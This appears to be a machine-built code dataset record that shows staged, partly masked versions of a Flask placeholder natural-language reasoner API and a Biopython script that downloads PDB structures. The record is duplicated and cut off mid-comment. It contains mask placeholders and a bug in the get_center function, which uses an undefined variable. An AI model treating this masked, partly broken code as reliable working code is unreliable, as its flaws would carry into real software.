"step-1": "<mask token>\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n<mask token>\n\n\[email protected]('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\[email protected]('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\[email protected]('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\[email protected]('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\n<mask token>\n\n\[email protected]('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\[email protected]('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\[email protected]('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\nVERSION = 0, 1, 0\nVERSION_STRING = '{}.{}.{}'.format(*VERSION)\nLANG_ID = 'lang.natural.english'\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\[email protected]('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\[email protected]('/api/{}/reason'.format(VERSION_STRING))\ndef reason_base():\n return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',\n 'reasonEnglish', 'Manually reason with natural language.']]})\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get('extraInfo')\n new_goal = old_goal.copy()\n new_goal['data'] = new_goal_data\n new_goal['language'] = LANG_ID\n print(new_goal)\n return new_goal\n\n\[email protected]('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\[email protected]('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\[email protected]('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-4": "from flask import Flask, jsonify, make_response, request\napp = Flask(__name__)\nVERSION = 0, 1, 0\nVERSION_STRING = '{}.{}.{}'.format(*VERSION)\nLANG_ID = 'lang.natural.english'\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\[email protected]('/')\ndef entry():\n return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':\n 'https://aaron.stockdill.nz/', 'version': VERSION_STRING,\n 'description': 'A placeholder natural language reasoner.', 'icon':\n '', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(\n VERSION_STRING), 'provides': {'reason': '/reason', 'translate':\n '/translate'}}])\n\n\[email protected]('/api/{}/reason'.format(VERSION_STRING))\ndef reason_base():\n return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',\n 'reasonEnglish', 'Manually reason with natural language.']]})\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get('extraInfo')\n new_goal = old_goal.copy()\n new_goal['data'] = new_goal_data\n new_goal['language'] = LANG_ID\n print(new_goal)\n return new_goal\n\n\[email protected]('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',\n 'POST'])\ndef reason_apply():\n rule_id = request.args.get('id')\n if rule_id == 'reasonEnglish':\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'goal')\n return jsonify({'result': 'success', 'newGoals': [new_goal] if\n new_goal['data'] else []})\n else:\n return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})\n\n\[email protected]('/api/{}/translate'.format(VERSION_STRING))\ndef translate_base():\n other_languages = ['lang.speedith', 'lang.isabelle']\n\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield x, y\n yield y, x\n return jsonify({'result': 'success', 'translations': [(from_lang,\n to_lang, 'manual') for from_lang, to_lang in all_pairs(\n other_languages, [LANG_ID])]})\n\n\[email protected]('/api/{}/translate/translate'.format(VERSION_STRING), methods=[\n 'GET', 'POST'])\ndef translate_apply():\n from_language = request.args.get('from')\n to_language = request.args.get('to')\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,\n to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, 'formula')\n return jsonify({'result': 'success', 'formula': new_goal})\n else:\n return jsonify({'result': 'failure', 'reason':\n 'Unable to translate when one of the languages is not {}'.\n format(LANG_ID)})\n\n\nif __name__ == '__main__':\n app.run()\n",
"step-5": "from flask import Flask, jsonify, make_response, request\n\n\napp = Flask(__name__)\n\nVERSION = (0, 1, 0)\nVERSION_STRING = \"{}.{}.{}\".format(*VERSION)\n\nLANG_ID = \"lang.natural.english\"\n\n\[email protected](404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\[email protected](\"/\")\ndef entry():\n return jsonify([{\n \"id\": \"com.natlang\",\n \"name\": \"NatLang\",\n \"website\": \"https://aaron.stockdill.nz/\",\n \"version\": VERSION_STRING,\n \"description\": \"A placeholder natural language reasoner.\",\n \"icon\": \"\",\n \"base\": \"http://aarons-macbook.local:5003/api/{}\".format(VERSION_STRING),\n \"provides\": {\n \"reason\": \"/reason\",\n \"translate\": \"/translate\"\n }\n }])\n\n\[email protected](\"/api/{}/reason\".format(VERSION_STRING))\ndef reason_base():\n return jsonify({\n \"result\": \"success\",\n \"reasoning\": [[LANG_ID, \"manual\", \"reasonEnglish\", \"Manually reason with natural language.\"]]\n })\n\n\ndef common_transform(json_data, key):\n old_goal = json_data.get(key)\n new_goal_data = json_data.get(\"extraInfo\")\n new_goal = old_goal.copy()\n new_goal[\"data\"] = new_goal_data\n new_goal[\"language\"] = LANG_ID\n print(new_goal)\n return new_goal\n\n\[email protected](\"/api/{}/reason/apply\".format(VERSION_STRING), methods=[\"GET\", \"POST\"])\ndef reason_apply():\n rule_id = request.args.get(\"id\")\n if rule_id == \"reasonEnglish\":\n json_data = request.get_json()\n new_goal = common_transform(json_data, \"goal\")\n return jsonify({\n \"result\": \"success\",\n \"newGoals\": [new_goal] if new_goal[\"data\"] else []\n })\n else:\n return jsonify({\n \"result\": \"failure\",\n \"reason\": \"Unknown rule ID.\"\n })\n\n\[email protected](\"/api/{}/translate\".format(VERSION_STRING))\ndef translate_base():\n other_languages = [\"lang.speedith\", \"lang.isabelle\"]\n def all_pairs(xs, ys):\n for x in xs:\n for y in ys:\n yield (x, y)\n yield (y, x)\n return jsonify({\n \"result\": \"success\",\n \"translations\": [(from_lang, to_lang, \"manual\")\n for (from_lang, to_lang) in all_pairs(other_languages, [LANG_ID])]\n })\n\n\[email protected](\"/api/{}/translate/translate\".format(VERSION_STRING), methods=[\"GET\", \"POST\"])\ndef translate_apply():\n from_language = request.args.get(\"from\")\n to_language = request.args.get(\"to\")\n print(LANG_ID in {from_language, to_language}, LANG_ID, from_language, to_language)\n if LANG_ID in {from_language, to_language}:\n json_data = request.get_json()\n new_goal = common_transform(json_data, \"formula\")\n return jsonify({\n \"result\": \"success\",\n \"formula\": new_goal\n })\n else:\n return jsonify({\n \"result\": \"failure\",\n \"reason\": \"Unable to translate when one of the languages is not {}\".format(LANG_ID)\n })\n\nif __name__ == \"__main__\":\n app.run()\n",
"step-ids": [
4,
5,
9,
10,
11
]
}
|
[
4,
5,
9,
10,
11
] |
<|reserved_special_token_0|>
def get_center(res_list):
coord = []
for atom in residue:
at = atom.coord
x = at[0]
y = at[1]
z = at[2]
atcord = [x, y, z]
coord.append(atcord)
x = 0
y = 0
z = 0
i = 0
for point in coord:
i = i + 1
x = x + point[0]
y = y + point[1]
z = z + point[2]
x = x / i
y = y / i
z = z / i
center = numpy.array([x, y, z])
return center
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_center(res_list):
coord = []
for atom in residue:
at = atom.coord
x = at[0]
y = at[1]
z = at[2]
atcord = [x, y, z]
coord.append(atcord)
x = 0
y = 0
z = 0
i = 0
for point in coord:
i = i + 1
x = x + point[0]
y = y + point[1]
z = z + point[2]
x = x / i
y = y / i
z = z / i
center = numpy.array([x, y, z])
return center
<|reserved_special_token_0|>
idx.readline()
<|reserved_special_token_0|>
for line in idx:
i = i + 1
print(i)
try:
protein = line[0:4]
protein = protein.lower()
parser = PDB.PDBParser(PERMISSIVE=1)
curdir = os.getcwd()
pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')
except:
Error_out.write('xxx\n')
Error_out.write('/n')
Error_out.write('<p>Error: %s</p>')
Error_out.write('xxx\n')
print('err')
continue
Error_out.close()
print('end')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_center(res_list):
coord = []
for atom in residue:
at = atom.coord
x = at[0]
y = at[1]
z = at[2]
atcord = [x, y, z]
coord.append(atcord)
x = 0
y = 0
z = 0
i = 0
for point in coord:
i = i + 1
x = x + point[0]
y = y + point[1]
z = z + point[2]
x = x / i
y = y / i
z = z / i
center = numpy.array([x, y, z])
return center
pdbl = PDB.PDBList()
Error_out = open('microfolds_out.txt', 'w')
cng = 0
AA = ['PHE', 'TRP', 'TYR', 'ALA', 'CYS', 'ASP', 'GLU', 'GLY', 'HIS', 'ILE',
'LYS', 'LEU', 'MET', 'ASN', 'PRO', 'GLN', 'ARG', 'SER', 'THR', 'VAL']
CF = [' DA', ' DC', ' DG', ' DT', ' A', ' C', ' G', ' U', 'HOH', 'UNK',
'UNX']
Metals = ['FE', 'MN', 'CU', 'CD', 'OS', 'CO', 'NI', 'W', 'PT', 'MO', 'U',
'TA', 'V', 'AU', 'IR', 'Y', 'GD', 'RU', 'YB', 'SM', 'PD', 'AG', 'EU',
'RH', 'PR', 'RE', 'LU', 'TB', 'HF', 'HO', 'DY', 'ZR', 'CR', 'LA', 'CE',
'ER', 'AM', 'CM', 'TH', 'PU', 'SC', 'PA']
cofactor = ['BCB', 'CLA', 'CHL', 'BCL', 'CL0', 'PMR', 'PHO']
idxfile = 'cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'
idx = open(idxfile, 'r')
idx.readline()
EC = ''
i = 0
for line in idx:
i = i + 1
print(i)
try:
protein = line[0:4]
protein = protein.lower()
parser = PDB.PDBParser(PERMISSIVE=1)
curdir = os.getcwd()
pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')
except:
Error_out.write('xxx\n')
Error_out.write('/n')
Error_out.write('<p>Error: %s</p>')
Error_out.write('xxx\n')
print('err')
continue
Error_out.close()
print('end')
<|reserved_special_token_1|>
import Bio
import os
import sys
from Bio import PDB
from Bio.PDB import PDBIO
from Bio.PDB.PDBParser import PDBParser
import math
import numpy
from collections import Counter
import random
from Bio.PDB import *
import gzip
def get_center(res_list):
coord = []
for atom in residue:
at = atom.coord
x = at[0]
y = at[1]
z = at[2]
atcord = [x, y, z]
coord.append(atcord)
x = 0
y = 0
z = 0
i = 0
for point in coord:
i = i + 1
x = x + point[0]
y = y + point[1]
z = z + point[2]
x = x / i
y = y / i
z = z / i
center = numpy.array([x, y, z])
return center
pdbl = PDB.PDBList()
Error_out = open('microfolds_out.txt', 'w')
cng = 0
AA = ['PHE', 'TRP', 'TYR', 'ALA', 'CYS', 'ASP', 'GLU', 'GLY', 'HIS', 'ILE',
'LYS', 'LEU', 'MET', 'ASN', 'PRO', 'GLN', 'ARG', 'SER', 'THR', 'VAL']
CF = [' DA', ' DC', ' DG', ' DT', ' A', ' C', ' G', ' U', 'HOH', 'UNK',
'UNX']
Metals = ['FE', 'MN', 'CU', 'CD', 'OS', 'CO', 'NI', 'W', 'PT', 'MO', 'U',
'TA', 'V', 'AU', 'IR', 'Y', 'GD', 'RU', 'YB', 'SM', 'PD', 'AG', 'EU',
'RH', 'PR', 'RE', 'LU', 'TB', 'HF', 'HO', 'DY', 'ZR', 'CR', 'LA', 'CE',
'ER', 'AM', 'CM', 'TH', 'PU', 'SC', 'PA']
cofactor = ['BCB', 'CLA', 'CHL', 'BCL', 'CL0', 'PMR', 'PHO']
idxfile = 'cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'
idx = open(idxfile, 'r')
idx.readline()
EC = ''
i = 0
for line in idx:
i = i + 1
print(i)
try:
protein = line[0:4]
protein = protein.lower()
parser = PDB.PDBParser(PERMISSIVE=1)
curdir = os.getcwd()
pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')
except:
Error_out.write('xxx\n')
Error_out.write('/n')
Error_out.write('<p>Error: %s</p>')
Error_out.write('xxx\n')
print('err')
continue
Error_out.close()
print('end')
<|reserved_special_token_1|>
import Bio
import os
import sys
from Bio import PDB
from Bio.PDB import PDBIO
from Bio.PDB.PDBParser import PDBParser
import math
import numpy
from collections import Counter
import random
from Bio.PDB import *
import gzip
def get_center(res_list):
coord = []
for atom in residue:
# print(atom.coord)
at=atom.coord
x=at[0]
y=at[1]
z=at[2]
atcord=[x,y,z]
coord.append(atcord)
x=0
y=0
z=0
i=0
for point in coord:
i=i+1
x=x+point[0]
y=y+point[1]
z=z+point[2]
x=x/i
y=y/i
z=z/i
center=numpy.array([x,y,z])
return center;
pdbl=PDB.PDBList()
Error_out=open("microfolds_out.txt","w")
cng=0
AA=['PHE','TRP','TYR','ALA','CYS','ASP','GLU','GLY','HIS','ILE','LYS','LEU','MET','ASN','PRO','GLN','ARG','SER','THR','VAL']
CF=[' DA',' DC',' DG',' DT',' A',' C',' G',' U','HOH','UNK','UNX']
Metals=['FE','MN','CU','CD','OS','CO','NI','W','PT','MO','U','TA','V','AU','IR','Y','GD','RU','YB','SM','PD','AG','EU','RH','PR','RE','LU','TB','HF','HO','DY','ZR','CR','LA','CE','ER','AM','CM','TH','PU','SC','PA']
cofactor=['BCB','CLA','CHL','BCL','CL0','PMR','PHO']
#organic_cofactors_list=[]
#organic_cofactors_pdb_file=open('manual_cofactor_list_with_quinone.txt','r')
#for line in organic_cofactors_pdb_file:
# line=line.split('\t')
# organic_cofactors_list.append(line[1][:-1])
idxfile='cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'
idx=open(idxfile,"r")
idx.readline()
#idx.readline()
#idx.readline()
EC=""
i=0
for line in idx:
i=i+1
print(i)
try:
protein=line[0:4]
protein=protein.lower()
parser = PDB.PDBParser(PERMISSIVE=1)
curdir=os.getcwd()
pdbl.retrieve_pdb_file(protein,pdir=curdir+'/pdbs/')
#print (protein,'/home/hraanan/pdb_download/'+protein[1:3]+'/pdb'+protein+'.ent.gz')
#print ('unziping')
# gz = gzip.open(filename, 'rb')
# with open(final_file, 'wb') as out:
# out.writelines(gz)
# gz.close()
# #structure = parser.get_structure(protein,protein+'.pdb')
##
# #print ('unziping done')
# #os.remove(filename)
# pdbl.retrieve_pdb_file(protein)
# structure = parser.get_structure(protein,protein[1:3]+'/pdb'+protein+'.ent')
# head= structure.header['head']
# comp = structure.header['compound']
# EC==""
#
# try:
# comp=comp['1']
## except KeyError:
## try:
## EC=comp['ec_number']
## except KeyError:
## try:
## EC=comp['ec']
# except KeyError:
# EC='-.-.-.-'
# try:
# EC=comp['ec']
# except KeyError:
# pass
# try:
# EC=comp['ec_number']
# except KeyError:
# pass
# if EC=="":
# EC='-.-.-.-'
# #print(EC)
###
###
#
# sf4ID=[]
# sf4coord=[]
# for model in structure:
# if model.id==0:
# atom_list = Selection.unfold_entities(model, 'A') # A for atoms
# ns = NeighborSearch(atom_list)
# lig=[]
# for chain in model:
# for residue in chain:
# #if residue.resname not in AA and residue.resname not in CF :
# #print(chain.id,residue.resname)
# if residue.resname in organic_cofactors_list:
# #print(chain.id,residue.resname)
# atom_in_res=[]
# for atom in residue:
# atom_in_res.append(atom.element)
#
# #if any(x in Metals for x in atom_in_res)==False:
# #print ('not metal')
# # continue
#
# center = get_center(residue)
# #print ('center',center)
# lig=protein,chain.id,residue.id[1],residue.resname,center
# #print(lig)
# all_neighbors = ns.search(center, 15.0,"R") # 15.0 for distance in angstrom
# microfold_name=protein+'.'+residue.resname+'_'+ chain.id +'_'+str(residue.id[1])+'_'+head+'_'+EC
# microfold_name=microfold_name.replace(' ','')
# microfold_name=microfold_name.replace('/','_')
# microfold_dir=residue.resname
# microfold_dir=microfold_dir.replace(' ','')
# # print(microfold_name)
# if not os.path.exists('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir):
# os.makedirs('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir)
# Select = Bio.PDB.Select
# class MicroSelect(Select):
# def accept_residue(self, residue):
# if residue in all_neighbors and residue.resname!='HOH':
# return 1
# else:
# return 0
# io=PDBIO()
# io.set_structure(structure)
# #print('/home/hraanan/MicrofoldsPDBs/'+microfold_dir+'/'+microfold_name+'.pdb', MicroSelect())
# io.save('/home/hraanan/MicrofoldsPDBs/organic/pdbs/'+microfold_dir+'/'+microfold_name+'.pdb', MicroSelect())
except:
# e = sys.exc_info()[0]
Error_out.write('xxx\n')
Error_out.write('/n' )
Error_out.write( "<p>Error: %s</p>" )
Error_out.write('xxx\n')
print('err')
continue
Error_out.close()
#prot.close()
print("end")
|
flexible
|
{
"blob_id": "8b29c12c294a8614d8be96c312ecffa9d3bcb3f8",
"index": 4575,
"step-1": "<mask token>\n\n\ndef get_center(res_list):\n coord = []\n for atom in residue:\n at = atom.coord\n x = at[0]\n y = at[1]\n z = at[2]\n atcord = [x, y, z]\n coord.append(atcord)\n x = 0\n y = 0\n z = 0\n i = 0\n for point in coord:\n i = i + 1\n x = x + point[0]\n y = y + point[1]\n z = z + point[2]\n x = x / i\n y = y / i\n z = z / i\n center = numpy.array([x, y, z])\n return center\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_center(res_list):\n coord = []\n for atom in residue:\n at = atom.coord\n x = at[0]\n y = at[1]\n z = at[2]\n atcord = [x, y, z]\n coord.append(atcord)\n x = 0\n y = 0\n z = 0\n i = 0\n for point in coord:\n i = i + 1\n x = x + point[0]\n y = y + point[1]\n z = z + point[2]\n x = x / i\n y = y / i\n z = z / i\n center = numpy.array([x, y, z])\n return center\n\n\n<mask token>\nidx.readline()\n<mask token>\nfor line in idx:\n i = i + 1\n print(i)\n try:\n protein = line[0:4]\n protein = protein.lower()\n parser = PDB.PDBParser(PERMISSIVE=1)\n curdir = os.getcwd()\n pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')\n except:\n Error_out.write('xxx\\n')\n Error_out.write('/n')\n Error_out.write('<p>Error: %s</p>')\n Error_out.write('xxx\\n')\n print('err')\n continue\nError_out.close()\nprint('end')\n",
"step-3": "<mask token>\n\n\ndef get_center(res_list):\n coord = []\n for atom in residue:\n at = atom.coord\n x = at[0]\n y = at[1]\n z = at[2]\n atcord = [x, y, z]\n coord.append(atcord)\n x = 0\n y = 0\n z = 0\n i = 0\n for point in coord:\n i = i + 1\n x = x + point[0]\n y = y + point[1]\n z = z + point[2]\n x = x / i\n y = y / i\n z = z / i\n center = numpy.array([x, y, z])\n return center\n\n\npdbl = PDB.PDBList()\nError_out = open('microfolds_out.txt', 'w')\ncng = 0\nAA = ['PHE', 'TRP', 'TYR', 'ALA', 'CYS', 'ASP', 'GLU', 'GLY', 'HIS', 'ILE',\n 'LYS', 'LEU', 'MET', 'ASN', 'PRO', 'GLN', 'ARG', 'SER', 'THR', 'VAL']\nCF = [' DA', ' DC', ' DG', ' DT', ' A', ' C', ' G', ' U', 'HOH', 'UNK',\n 'UNX']\nMetals = ['FE', 'MN', 'CU', 'CD', 'OS', 'CO', 'NI', 'W', 'PT', 'MO', 'U',\n 'TA', 'V', 'AU', 'IR', 'Y', 'GD', 'RU', 'YB', 'SM', 'PD', 'AG', 'EU',\n 'RH', 'PR', 'RE', 'LU', 'TB', 'HF', 'HO', 'DY', 'ZR', 'CR', 'LA', 'CE',\n 'ER', 'AM', 'CM', 'TH', 'PU', 'SC', 'PA']\ncofactor = ['BCB', 'CLA', 'CHL', 'BCL', 'CL0', 'PMR', 'PHO']\nidxfile = 'cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'\nidx = open(idxfile, 'r')\nidx.readline()\nEC = ''\ni = 0\nfor line in idx:\n i = i + 1\n print(i)\n try:\n protein = line[0:4]\n protein = protein.lower()\n parser = PDB.PDBParser(PERMISSIVE=1)\n curdir = os.getcwd()\n pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')\n except:\n Error_out.write('xxx\\n')\n Error_out.write('/n')\n Error_out.write('<p>Error: %s</p>')\n Error_out.write('xxx\\n')\n print('err')\n continue\nError_out.close()\nprint('end')\n",
"step-4": "import Bio\nimport os\nimport sys\nfrom Bio import PDB\nfrom Bio.PDB import PDBIO\nfrom Bio.PDB.PDBParser import PDBParser\nimport math\nimport numpy\nfrom collections import Counter\nimport random\nfrom Bio.PDB import *\nimport gzip\n\n\ndef get_center(res_list):\n coord = []\n for atom in residue:\n at = atom.coord\n x = at[0]\n y = at[1]\n z = at[2]\n atcord = [x, y, z]\n coord.append(atcord)\n x = 0\n y = 0\n z = 0\n i = 0\n for point in coord:\n i = i + 1\n x = x + point[0]\n y = y + point[1]\n z = z + point[2]\n x = x / i\n y = y / i\n z = z / i\n center = numpy.array([x, y, z])\n return center\n\n\npdbl = PDB.PDBList()\nError_out = open('microfolds_out.txt', 'w')\ncng = 0\nAA = ['PHE', 'TRP', 'TYR', 'ALA', 'CYS', 'ASP', 'GLU', 'GLY', 'HIS', 'ILE',\n 'LYS', 'LEU', 'MET', 'ASN', 'PRO', 'GLN', 'ARG', 'SER', 'THR', 'VAL']\nCF = [' DA', ' DC', ' DG', ' DT', ' A', ' C', ' G', ' U', 'HOH', 'UNK',\n 'UNX']\nMetals = ['FE', 'MN', 'CU', 'CD', 'OS', 'CO', 'NI', 'W', 'PT', 'MO', 'U',\n 'TA', 'V', 'AU', 'IR', 'Y', 'GD', 'RU', 'YB', 'SM', 'PD', 'AG', 'EU',\n 'RH', 'PR', 'RE', 'LU', 'TB', 'HF', 'HO', 'DY', 'ZR', 'CR', 'LA', 'CE',\n 'ER', 'AM', 'CM', 'TH', 'PU', 'SC', 'PA']\ncofactor = ['BCB', 'CLA', 'CHL', 'BCL', 'CL0', 'PMR', 'PHO']\nidxfile = 'cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'\nidx = open(idxfile, 'r')\nidx.readline()\nEC = ''\ni = 0\nfor line in idx:\n i = i + 1\n print(i)\n try:\n protein = line[0:4]\n protein = protein.lower()\n parser = PDB.PDBParser(PERMISSIVE=1)\n curdir = os.getcwd()\n pdbl.retrieve_pdb_file(protein, pdir=curdir + '/pdbs/')\n except:\n Error_out.write('xxx\\n')\n Error_out.write('/n')\n Error_out.write('<p>Error: %s</p>')\n Error_out.write('xxx\\n')\n print('err')\n continue\nError_out.close()\nprint('end')\n",
"step-5": "import Bio\r\nimport os\r\nimport sys\r\nfrom Bio import PDB\r\nfrom Bio.PDB import PDBIO\r\nfrom Bio.PDB.PDBParser import PDBParser\r\nimport math\r\nimport numpy\r\nfrom collections import Counter\r\nimport random \r\nfrom Bio.PDB import *\r\nimport gzip\r\ndef get_center(res_list):\r\n coord = []\r\n \r\n for atom in residue:\r\n # print(atom.coord)\r\n at=atom.coord\r\n x=at[0]\r\n y=at[1]\r\n z=at[2]\r\n atcord=[x,y,z]\r\n coord.append(atcord)\r\n x=0\r\n y=0\r\n z=0\r\n i=0\r\n for point in coord:\r\n i=i+1\r\n x=x+point[0]\r\n y=y+point[1]\r\n z=z+point[2]\r\n x=x/i\r\n y=y/i\r\n z=z/i\r\n center=numpy.array([x,y,z]) \r\n return center;\r\n\r\n\r\n\r\npdbl=PDB.PDBList()\r\nError_out=open(\"microfolds_out.txt\",\"w\")\r\n\r\n\r\ncng=0\r\nAA=['PHE','TRP','TYR','ALA','CYS','ASP','GLU','GLY','HIS','ILE','LYS','LEU','MET','ASN','PRO','GLN','ARG','SER','THR','VAL']\r\nCF=[' DA',' DC',' DG',' DT',' A',' C',' G',' U','HOH','UNK','UNX']\r\nMetals=['FE','MN','CU','CD','OS','CO','NI','W','PT','MO','U','TA','V','AU','IR','Y','GD','RU','YB','SM','PD','AG','EU','RH','PR','RE','LU','TB','HF','HO','DY','ZR','CR','LA','CE','ER','AM','CM','TH','PU','SC','PA']\r\ncofactor=['BCB','CLA','CHL','BCL','CL0','PMR','PHO']\r\n\r\n#organic_cofactors_list=[]\r\n#organic_cofactors_pdb_file=open('manual_cofactor_list_with_quinone.txt','r')\r\n#for line in organic_cofactors_pdb_file:\r\n# line=line.split('\\t')\r\n# organic_cofactors_list.append(line[1][:-1])\r\n\r\n\r\n\r\n\r\nidxfile='cullpdb_pc90_res10_R1_inclNOTXRAY_inclCA_d161006_chains.txt'\r\nidx=open(idxfile,\"r\")\r\nidx.readline()\r\n#idx.readline()\r\n#idx.readline()\r\nEC=\"\"\r\ni=0\r\nfor line in idx:\r\n i=i+1\r\n print(i)\r\n try:\r\n \r\n protein=line[0:4]\r\n protein=protein.lower()\r\n parser = PDB.PDBParser(PERMISSIVE=1)\r\n curdir=os.getcwd()\r\n pdbl.retrieve_pdb_file(protein,pdir=curdir+'/pdbs/')\r\n #print (protein,'/home/hraanan/pdb_download/'+protein[1:3]+'/pdb'+protein+'.ent.gz')\r\n #print ('unziping')\r\n# gz = gzip.open(filename, 'rb') \r\n# with open(final_file, 'wb') as out: \r\n# out.writelines(gz) \r\n# gz.close()\r\n# #structure = parser.get_structure(protein,protein+'.pdb') \r\n## \r\n# #print ('unziping done')\r\n# #os.remove(filename)\r\n# pdbl.retrieve_pdb_file(protein)\r\n# structure = parser.get_structure(protein,protein[1:3]+'/pdb'+protein+'.ent')\r\n# head= structure.header['head']\r\n# comp = structure.header['compound']\r\n# EC==\"\"\r\n# \r\n# try:\r\n# comp=comp['1']\r\n## except KeyError:\r\n## try:\r\n## EC=comp['ec_number']\r\n## except KeyError:\r\n## try:\r\n## EC=comp['ec']\r\n# except KeyError:\r\n# 